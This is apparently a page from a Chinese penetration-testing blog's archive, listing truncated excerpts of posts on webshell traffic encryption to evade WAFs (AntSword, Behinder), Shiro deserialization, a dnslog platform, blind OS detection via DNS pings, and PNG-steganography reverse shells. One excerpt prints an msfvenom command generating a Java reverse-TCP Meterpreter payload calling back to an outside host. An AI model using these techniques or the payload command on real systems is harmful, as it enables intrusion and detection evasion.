0x00 前言一直想找一个burp的验证码识别插件,网上看了好几款,像reCAPTCHA/captcha-killer,要找的不是说验证码识别算法或者库,是一个可以和intruder、验证码识别接口同时对接的插件,可以灵活配置自己需要的验证码识别接口,最终选择了captcha killergithub地址: https://github.com/c0ny……继续阅读 » lz520520 4年前 (2020-07-27) 24611浏览 4个赞
0x00 前言前两篇从蚁剑的介绍,编解码器的功能讲解,到源码分析和解码器的改造,其实已经实现了大部分流量的加密传输,只要在设计一个简单的加密算法即可,比如异或算法,用字符串和key做异或即可,这样其实能过掉绝大部分的WAF了,但我们的流量里还有一点小瑕疵,也就是第一章提到的其他参数,其他参数由于固定了编码方式,如base64、hex,很容易被解析检测到,也……继续阅读 » lz520520 5年前 (2020-05-03) 8606浏览 26个赞
0x00 前言上一篇讲过了编码器和解码器,本篇会讲解蚁剑源码部分,添加asp/aspx解码模块,来实现asp/aspx的加密回显。0x01 蚁剑源码介绍大家蚁剑可能用到最多的还是php,之前对编解码一知半解的小伙伴,现在应该知道编解码器的强大之处了吧,网上也提供了很多编解码器,然而你如果想让asp/aspx编写解码器,会发现蚁剑根本不支持这个功能,这种……继续阅读 » lz520520 5年前 (2020-05-03) 772浏览 4个赞
0x00 前言为什么会有修改蚁剑这个念头呢,之前有朋友对冰蝎做了改造,本来冰蝎就是加密传输,可对抗大多数WAF,但因为有一些弱特征、强特征等,通过流量分析转换成自动化检测,也可以做到冰蝎流量检测的,比如密钥交互特征,但改造之后,基本是无法检测的,跳过了密钥交互这个步骤,将AES密钥写死,还有其他新增的机制不仅仅对抗WAF,还可以对抗人工分析。冰蝎改造需要……继续阅读 » lz520520 5年前 (2020-04-06) 743浏览 5个赞
0x00 前言shiro这个漏洞简单说下,通过cookie字段设置rememberMe,构造序列化的payload,让服务器反序列化执行的,payload大致如下。然后payload的生成流程是这样的:16字节AES初始化向量+序列化字符串-->AES加密-->base64编码。关键点在于AES的key,shiro1.2.4以下是硬编……继续阅读 » lz520520 5年前 (2020-01-06) 1757浏览 0个赞
首先dnslog平台源码包链接如下dnslog这个平台目前dnslog可以投入实战了,web日志记录还未测试,后续优化,目前全dns解析都指向127.0.0.1。0x00 购买域名这里推荐使用godaddy,不需要实名认证,如果使用其他平台就跳过此步。访问www.godaddy.com,注册一个账号,这个账号使用邮箱注册,注册之后还需要有个安全验证……继续阅读 » lz520520 5年前 (2019-12-08) 1897浏览 4个赞
判断linux还是windows1.先测试ping.exe test.ob3.ceye.io 是否接收到dnslog解析,如果可以则说明是windows2.再测试ping -c 1 test.ob3.ceye.io,如果可以执行说明是linux。需要注意的是,windows执行 ping -c 1 也是可以成功的,但需要超管权限,所以要先测试第一条命令……继续阅读 » lz520520 5年前 (2019-12-03) 1130浏览 1个赞
时间2019-11-15影响范围:<=1.9.1 点击overview,可以看到当前版本,下面演示的是1.8.0 1.先通过msf生成一个jar包msfvenom -p java/meterpreter/reverse_tcp lhost=1.1.1.1 lport=53 -f jar > msf.jar……继续阅读 » lz520520 5年前 (2019-11-15) 729浏览 3个赞
0x00 准备首先需要下载两个程序burp插件 jsEncrypter:https://github.com/c0ny1/jsEncrypter/releases解析js的无头浏览器:https://phantomjs.org/download.html 简单讲下原理,其实就是用phantomjs搭建一个本地js服务器,里面有前端网页使用……继续阅读 » lz520520 5年前 (2019-11-08) 1231浏览 0个赞
0x00 前言最近看到一篇微信文章说是可以利用png反弹shell,我还以为图片查看器有什么漏洞,可以在png植入payload然后执行的。最后测试复现不了,然后分析了下ps脚本,原来只是利用了一种图片隐写术,将payload隐藏到png图片里,然后再通过提供的powershell命令去提取png中的payload运行,最后实现了反弹shell,而那篇文……继续阅读 » lz520520 5年前 (2019-10-09) 1261浏览 0个赞
第 5 页,共 7 页« 最新«...34567»